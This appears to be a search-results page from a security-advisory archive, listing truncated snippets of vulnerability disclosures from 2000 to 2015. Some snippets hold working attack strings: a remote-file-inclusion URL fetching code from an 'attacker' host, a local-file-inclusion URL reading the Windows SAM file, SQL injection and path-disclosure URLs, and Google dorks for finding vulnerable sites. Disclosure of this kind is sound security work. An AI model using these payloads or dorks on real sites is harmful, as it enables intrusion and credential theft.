47153 matches found
[ MDVSA-2014:228 ] phpmyadmin
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2014:228 http://www.mandriva.com/en/support/security/ Package : phpmyadmin Date : November 26, 2014 Affected: Business Server 1.0 Problem Description: Multiple vulnerabilities has been discovered and corrected in...
[SECURITY] [DSA 2740-1] python-django security update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2740-1 [email protected] http://www.debian.org/security/ Salvatore Bonaccorso August 23, 2013 http://www.debian.org/security/faq -...
SEC Consult SA-20130403-0 :: Multiple vulnerabilities in Sophos Web Protection Appliance
SEC Consult Vulnerability Lab Security Advisory 20130403-0 ======================================================================= title: Multiple vulnerabilities product: Sophos Web Protection Appliance vulnerable version: = 3.7.8.1 fixed version: 3.7.8.2 impact: Critical CVE number:...
Bookmark4U lostpasswd.php env[include_prefix] Parameter RFI
vendor - http://bookmark4u.sourceforge.net/ version - 2.1 solution - product discontinued example - http://target/bookmark4u/lostpasswd.php?env5Bincludeprefix5D=http://attacker/path/to/file.txt???...
[XSS] i found a xss on "page" parameter in "eccredit.php" in Dvbbs < 8.3.0
Home Page : http://www.dvbbs.net/ Dvbbs is prone to an cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the...
CA ARCserve Backup Discovery Service Denial of Service Vulnerability
Title: CA ARCserve Backup Discovery Service Denial of Service Vulnerability CA Advisory Date: 2008-06-17 Reported By: Luigi Auriemma Impact: A remote attacker can cause a denial of service. Summary: CA ARCserve Backup contains a vulnerability in the Discovery service casdscsvc that can allow a...
S21SEC-043-en:Cezanne SW Blind SQL Injection
S21Sec Advisory - Title: Cezanne SW login required Blind SQL Injection ID: S21SEC-043-en Severity: High History: 02.Jan.2008 Vulnerability discovered Authors: Juan de la Fuente Costa [email protected] Fco Javier Puerta Rubio [email protected] URL: http://www.s21sec.com/avisos/s21sec-43-en.txt...
Sendcard (sendcard.php) Sendcard Local File Inclusion Vulnerability
Sendcard sendcard.php Sendcard Local File Inclusion Vulnerability Discovered: ettee Dork: "Powered by sendcard - an advanced PHP e-card program" -site:sendcard.org "powered by Sendcard" Bug: "// Get the template details if!isset$form || $form == '' $form = "form"; if!isset$des || $des == '' $des ...
[Full-disclosure] Blind sql injection attack in INSERT syntax on PHP-nuke <=8.0 Final
Hello, it is my new advisory: Problem:Blind sql injection attack in INSERT syntax Product:PHP-nuke =8.0 Web page:http://phpnuke.org/ Credit:Maciej krasza Kukla @mail:[email protected] homepage:www.krasza.int.pl 1.Description ...PHP-Nuke 8.0 Final version. This version includes a new anti-flood...
flashChat 4.7.8 Cross Site Scripting Vulnerability
/ Flashchat 4.7.8 / Date of written Advisory: February 04, 2007 Product: Flash Chat = 4.7.8 Vendor: http://tufat.com/ Description: flashChat is a highly customizable PHP/MySQL based chat room script that is easily integrated into a website and mimics IRC in it's command structure Exploits /...
Etomite CMS 0.6.1.2 Vulnerabilities + ContenNow 1.39 Vulnerabilities + Exploits
Etomite CMS 0.6.1.2 Multiple Vulnerabilities Severity : Medium risk Vendor : www.etomite.org Author : Alfredo Pesoli 'revenge' Secunia Advisory : SA22885 Security Focus BID : 21135 -------------------------------------------------- Description Etomite is a PHP Content Management System, more info...
[SA22676] Sun Solaris NVIDIA Graphics Driver Buffer Overflow Vulnerability
TITLE: Sun Solaris NVIDIA Graphics Driver Buffer Overflow Vulnerability SECUNIA ADVISORY ID: SA22676 VERIFY ADVISORY: http://secunia.com/advisories/22676/ CRITICAL: Highly critical IMPACT: Privilege escalation, DoS, System access WHERE: From remote OPERATING SYSTEM: Sun Solaris 10...
Infostring crash and shutdown in the Quake 3 engine
Luigi Auriemma Application: Quake 3 engine http://www.idsoftware.com Games: - Call of Duty = 1.5 - Call of Duty: United Offensive = 1.51 - Heavy Metal: F.A.K.K.2 = 1.02 - Quake III Arena = 1.32 - Return to Castle Wolfenstein = 1.41 - Soldier of Fortune II: Double Helix = 1.03 - Star Trek Voyager:...
phpMyAdmin XSS Vulnerabilities, Transversal Directory Attack , Information Encoding Weakness and Path Disclosures
phpMyAdmin XSS Vulnerabilities, Transversal Directory Attack , Information Encoding Weakness and Path Disclosures -------------------- Product: phpMyAdmin Vendor: phpMyAdmin Development Team Versions: VULNERABLE - 2.5.2 CVS in Development - 2.5.x - 2.4.x - 2.3.x - 2.2.x - 2.1.x - 2.0.x - 1.x.x NO...
SSL protection bypass in Ximian Evolution
Insufficient certificate check on restored connection...
A-FTP Anonymous FTP Server Remote DoS attack Vulnerability
A-FTP Anonymous FTP Server Remote DoS attack Vulnerability Cartel Advisory Code: CART-0102 Vendor Affected: A-FTP Server - Eirik Helgeland [email protected] / [email protected] What It Is from the author: A free Unix Compatible Anonymous FTP server, running hidden from the user. Can be starte...
Security Update: DoS on gpm
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Caldera Systems, Inc. Security Advisory Subject: DoS on gpm Advisory number: CSSA-2000-024.0 Issue date: 2000 July, 6 Cross reference: 1. Problem Description There are security problems within gpm General Purpose Mouse support daemon which allow remov...
[SYSS-2015-005] Kaspersky Total Security - Authentication Bypass
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-005 Product: Kaspersky Total Security KTS Vendor: Kaspersky Lab ZAO Affected Versions: 15.0.1.415 Tested Versions: 15.0.1.415 Vulnerability Type: Authentication Bypass Using an Alternate Path or Channel CWE-288 Risk Level:...
APPLE-SA-2015-09-21-1 watchOS 2
APPLE-SA-2015-09-21-1 watchOS 2 watchOS 2 is now available and addresses the following: Apple Pay Available for: Apple Watch Sport, Apple Watch, and Apple Watch Edition Impact: Some cards may allow a terminal to retrieve limited recent transaction information when making a payment Description: Th...
libuser / userhelper security vulnerabilities
Unsafe files handling, insufficient characters filtering...
[SE-2014-01] Security vulnerabilities in Oracle Database Java VM
Hello All, Security Explorations discovered multiple security issues in the implementation of a Java VM embedded in Oracle Database software 1. Discovered security issues violate many "Secure Coding Guidelines for the Java Programming Language" 2. Most of them demonstrate a well known problem...
[slackware-security] subversion (SSA:2014-058-01)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 slackware-security subversion SSA:2014-058-01 New subversion packages are available for Slackware 14.0, 14.1, and -current to fix denial-of-service issues. Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+...
Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities
Exploit Title: Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities Exploit Author: absane Blog: http://blog.noobroot.com Discovery date: September 29th 2013 Vendor notified: September 29th 2013 Vendor fixed: October 2 2013 Vendor Homepage: http://cart66.com Software Link:...
APPLE-SA-2013-06-04-1 OS X Mountain Lion v10.8.4 and Security Update 2013-002
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2013-06-04-1 OS X Mountain Lion v10.8.4 and Security Update 2013-002 OS X Mountain Lion v10.8.4 and Security Update 2013-002 is now available and addresses the following: CFNetwork Available for: OS X Mountain Lion v10.8 to v10.8.3 Impact: An...
APPLE-SA-2012-09-19-1 iOS 6
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2012-09-19-1 iOS 6 iOS 6 is now available and addresses the following: CFNetwork Available for: iPhone 3GS and later, iPod touch 4th generation and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to the...
DomsHttpd 1.0 <= Remote Denial Of Service
DomsHttpd 1.0 = Remote Denial Of Service Discovered by: Jean Pascal Pereira [email protected] About DomsHttpd: "A very simple HTTP protocol program base on asynchronous socket model." Vendor URI: http://domshttpd.codeplex.com/ The remote attacker has the possibility to crash the application by...
Warah Agencia (productos.php?categoria_id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability Warah Agencia productos.php?categoriaid AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.warah.com.ar/ Persian Gulf 4 Ever! Dork : "DESIGN BY WARAH AGENCIA CREATIVA"...
[RT-SA-2011-004] Client Side Authorization ZyXEL ZyWALL USG Appliances Web Interface
Advisory: Client Side Authorization ZyXEL ZyWALL USG Appliances Web Interface The ZyXEL ZyWALL USG appliances perform parts of the authorization for their management web interface on the client side using JavaScript. By setting the JavaScript variable "isAdmin" to "true", a user with limited acce...
HTB22914: Local File Inclusion in UseBB
Vulnerability ID: HTB22914 Reference: http://www.htbridge.ch/advisory/localfileinclusioninusebb.html Product: UseBB Vendor: UseBB http://www.usebb.net/ Vulnerable Version: 1.0.11 Vendor Notification: 22 March 2011 Vulnerability Type: Local File Inclusion Risk level: Medium Credit: High-Tech Bridg...
R7-0038: Check Point Endpoint Security Server Information Disclosure
R7-0038: Check Point Endpoint Security Server Information Disclosure February 7, 2011 -- Vulnerability Details: The Check Point Endpoint Security Server and Integrity Server products inadvertently expose a number of private directories through the web interface. These directories include the SSL...
MyBB 1.6 <= SQL Injection Vulnerability
================================= MyBB 1.6 = SQL Injection Vulnerability ================================= 1. OVERVIEW Potential SQL Injection vulnerability was detected in MyBB. 2. APPLICATION DESCRIPTION MyBB is a free bulletin board system software package developed by the MyBB Group. It's...
n.runs-SA-2010.001 - Alcatel-Lucent - unauthenticated administrative access to CTI CCA Server
n.runs AG http://www.nruns.com/ securityatnruns.com n.runs-SA-2010.001 20-September-2010 Vendor: Alcatel Affected Products: Versions before 9.0.8.4 of the CCAgent option of OmniTouch Contact Center Standard Edition Vulnerability: unauthenticated administrative access to CTI CCA Server Risk: High...
Mozilla Foundation Security Advisory 2010-30
Mozilla Foundation Security Advisory 2010-30 Title: Integer Overflow in XSLT Node Sorting Impact: Critical Announced: June 22, 2010 Reporter: Martin Barbella Products: Firefox, Thunderbird, SeaMonkey Fixed in: Firefox 3.6.4 Firefox 3.5.10 Thunderbird 3.0.5 SeaMonkey 2.0.5 Description Security...
PR10-02: Various XSS and information disclosure flaws within 3Com* iMC (Intelligent Management Center)
PR10-02: Various XSS and information disclosure flaws within 3Com iMC Intelligent Management Center On the 12th April 2010 Hewlett Packard completed its acquisition of 3Com Vulnerability found: 29th January 2010 Vendor informed: 1st February 2010 Vulnerability fixed: 13th May 2010 Severity:...
[SECURITY] [DSA-2002-1] New polipo packages fix denial of service
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-2002-1 [email protected] http://www.debian.org/security/ Stefan Fritsch February 19, 2010 http://www.debian.org/security/faq -...
[SECURITY] CVE-2009-0580 UPDATED Apache Tomcat User enumeration vulnerability with FORM authentication
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Updated to clarify affected versions as they vary for each affected Realm. CVE-2009-0580: Tomcat information disclosure vulnerability Severity: Low Vendor: The Apache Software Foundation Versions Affected: MemoryRealm: Tomcat 4.1.0 to 4.1.39 Tomcat...
FreeBSD Security Advisory FreeBSD-SA-09:01.lukemftpd
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ============================================================================= FreeBSD-SA-09:01.lukemftpd Security Advisory The FreeBSD Project Topic: Cross-site request forgery in lukemftpd8 Category: core Module: lukemftpd Announced: 2009-01-07...
PHP-Nuke Module Current_Issue (summary&id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability PHP-Nuke Module CurrentIssue summary&id AuTh0r : EhsanHp200 H0ME : www.only-4dl.tk Email : [email protected] Dork : "inurl:modules.php?name=CurrentIssue" Exploite:...
Mozilla Foundation Security Advisory 2008-13
Mozilla Foundation Security Advisory 2008-13 Title: Multiple XSS vulnerabilities from character encoding Impact: Moderate Announced: March 25, 2008 Reporter: Alexey Proskuryakov, Yosuke Hasegawa, Simon Montagu Products: Firefox, Thunderbird, SeaMonkey Fixed in: Firefox 2.0.0.12 Thunderbird 2.0.0....
Sql Injection in wordpress 2.3.1
Author : Beenu Arora Mail : [email protected] Application : WordPress 2.3.1 Homepage: http://wordpress.org/ SQL Injection Vulnerable URL : http://localhost/pathtowordpress/?feed=rss2&p= Parameter : P POC =...
Webspell 4.x Local File Inclusion
muH - $Title: Webspell 4.x Local File Inclusion Win $Damage Factor: Medium - High $Requires: Win Box & Php Supporting 00 $Discovered by muH $Usage: http://server.com/index.php?site=c:windowsrepairsam00...
PhpbbXtra v2.0 (phpbb_root_path) Remote File Include Vulnerability
----------------------------------------------- PhpbbXtra v2.0 phpbbrootpath Remote File Include Vulnerability ----------------------------------------------- Author: xoron ----------------------------------------------- Vuln Code: include$phpbbrootpath . 'includes/bbcode.'.$phpEx;...
zenphoto Multiple Path Disclosure and Cross Site Scripting Vulnerabilities
Vendor: zenphoto Vulnerable: zenphoto 1.0.2 beta and below The vendor has been warned and the vulnerabilities have been addressed in 1.0.3 beta. Path Disclosure --------------- http://www.example.com/photos/zen/i.php?a=EXISTINGALBUMNAME&i=EXISTINGIMAGENAME&s=thumb00 which returns: Warning:...
Microsoft Windows XP SP2 non-executable memory (DEP) protection bypass
By using small memory regisouns it's possible to place executable code into non-executable memory regions...
D-Forum (PHP)
Informations : °°°°°°°°°°°°°° Website : http://www.adalis.fr/adalis.html Versions : 1.00 - 1.11 Problem : Include file PHP Code/Location : °°°°°°°°°°°°°°°°°°° /includes/header.php3 : --------------------------- ?php if $myheader!="" include $myheader; else ? ... --------------------------...
Sample SecurID Token Emulator with Token Secret Import
Sample SecurID Token Emulator with Token Secret Import We have performed some cryptoanalysis and let's just say we do have grounds to believe that this algorithm is easily breakable. Once again, security of the cipher should be based entirely on the secrecy of the key, not the algorithm. Least...
[USN-2658-1] PHP vulnerabilities
========================================================================== Ubuntu Security Notice USN-2658-1 July 06, 2015 php5 vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubunt...
CollabNet Subversion Edge downloadHook local file inclusion
Vuln Title: Local file inclusion in CollabNet Subversion Edge Management Frontend via logfile "filename" parameter of the "downloadHook" action Date: 28.06.2015 Author: otr Software Link: https://www.open.collab.net/downloads/svnedge Vendor: CollabNet Version: 4.0.11 Tested on: Fedora Linux Type:...
CollabNet Subversion Edge weak password policy
Vuln Title: The CollabNet Subversion Edge Management Frontend does not implement a strong password policy Date: 28.06.2015 Author: otr Software Link: https://www.open.collab.net/downloads/svnedge Vendor: CollabNet Version: 4.0.11 Tested on: Fedora Linux Type: Lack of defensive measures Risk: Medi...
Adobe Flash Player multiple security vulnerabilities
Buffer overflows, memory corruptions, integer overflows, race conditions, restriction bypass...